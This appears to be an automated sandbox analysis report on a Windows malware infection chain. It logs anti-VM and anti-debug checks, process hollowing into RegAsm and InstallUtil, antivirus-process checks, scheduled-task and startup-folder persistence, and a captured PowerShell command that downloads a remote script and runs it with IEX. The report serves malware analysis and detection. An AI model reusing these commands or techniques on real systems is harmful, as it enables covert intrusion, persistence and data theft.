Source: 3546345.exe.11.dr	Binary or memory string: MPGamesUnknown %dTwitch StudioFacebookToolbarMessengersrcOEMLenovoServiceBridgeThinkBuzanFree_PDF_SolutionsVMwarePunkBusterNoxSony CorporationRAV Endpoint Protection
Source: kitty.exe, 00000018.00000002.3280704140.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	Binary or memory string: vmware
Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dllal\
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, D0nMCdvUeB.exe.51.dr	Binary or memory string: HgFSVDCVdb86m2CfHM1
Source: Cerker.exe, 0000001C.00000003.4062158892.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dll.0\
Source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: channel2[1].exe.11.dr	Binary or memory string: (32-bit)DBGIsolatedStorageIdentityNexusIntegrationUnknown %dMovavi Video ConverterMovavi Video Editor/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$Resp = Invoke-WebRequest -Uri 'https://update-ledger.net/update' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr"Free_PDF_SolutionsLenovoServiceBridgeVMwareu^
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWV!t
Source: Channel1[1].exe.11.dr	Binary or memory string: ey&[ySUPERAntiSpywareCrashReportClientContacts.VirtualBoxLenovoServiceBridgeEdrawFree_PDF_SolutionsVMwarewalletsLGHUBLogitechAnkamaw+bMegaDownloaderThinkBuzanCode CacheABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ODISWindowsCommsOpera Software\Opera GX StableatomNichromeCyberLinkMetroVALORANT>
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\jq
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,jq
Source: winmsbt.exe, 00000021.00000002.4601446833.000000000102C000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4739504594.000000001BCC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process queried: DebugPort
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006245D5 BlockInput,

19_2_006245D5

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_005C5240

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005E5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

19_2_005E5CAC

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406312

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF0DD mov eax, dword ptr fs:[00000030h]	24_2_00CBF0DD
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF099 mov eax, dword ptr fs:[00000030h]	24_2_00CBF099
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB5760 mov eax, dword ptr fs:[00000030h]	24_2_00CB5760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F0DD mov eax, dword ptr fs:[00000030h]	27_2_0075F0DD
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00755760 mov eax, dword ptr fs:[00000030h]	27_2_00755760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F099 mov eax, dword ptr fs:[00000030h]	27_2_0075F099
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043DCE2 mov eax, dword ptr fs:[00000030h]	31_2_0043DCE2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00439F7B mov eax, dword ptr fs:[00000030h]	31_2_00439F7B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A0FACB push dword ptr fs:[00000030h]	31_2_02A0FACB
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2A1E2 mov eax, dword ptr fs:[00000030h]	31_2_02B2A1E2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF092B mov eax, dword ptr fs:[00000030h]	31_2_02AF092B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2DF49 mov eax, dword ptr fs:[00000030h]	31_2_02B2DF49
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF0D90 mov eax, dword ptr fs:[00000030h]	31_2_02AF0D90

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

19_2_006088CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process token adjusted: Debug
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DA354 SetUnhandledExceptionFilter,	19_2_005DA354
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_005DA385
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00CB0811
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB3DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00CB3DF3
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00CB0594
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB06F7 SetUnhandledExceptionFilter,	24_2_00CB06F7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00750811
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00753DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00753DF3
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00750594
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007506F7 SetUnhandledExceptionFilter,	27_2_007506F7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043A4FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0043A4FE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004215F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_004215F5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00420C37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_00420C37
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2A765 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_02B2A765
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B1185C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_02B1185C
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B10E9E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_02B10E9E

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe

Code function: 24_2_00C94780 CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualAllocEx,GetLastError,VirtualAllocEx,WriteProcessMemory,SetThreadContext,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,ResumeThread,

24_2_00C94780

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 48A000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11DC008
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DCD008
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 50B000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E86008

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00609369 LogonUserW,

19_2_00609369

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_005C5240

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00611AC6 SendInput,keybd_event,

19_2_00611AC6

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006151E2 mouse_event,

19_2_006151E2

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_006088CD

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

19_2_00614F1C

Source: Shipment.pif, 0000000B.00000000.2048496532.0000000000A06000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2073972138.0000000000666000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: GuardTrack.scr	Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005D885B cpuid

19_2_005D885B

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC688E
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC6843
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CBC03B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_00CC69B4
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC6929
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CC6C07
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CBC59D
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_00CC65A1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_00CC6D2D
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CC6E33
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_00CC6F02
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_00766843
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_0075C03B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_0076688E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_00766929
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	27_2_007669B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_00766C07
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	27_2_00766D2D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	27_2_007665A1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_0075C59D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_00766E33
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	27_2_00766F02

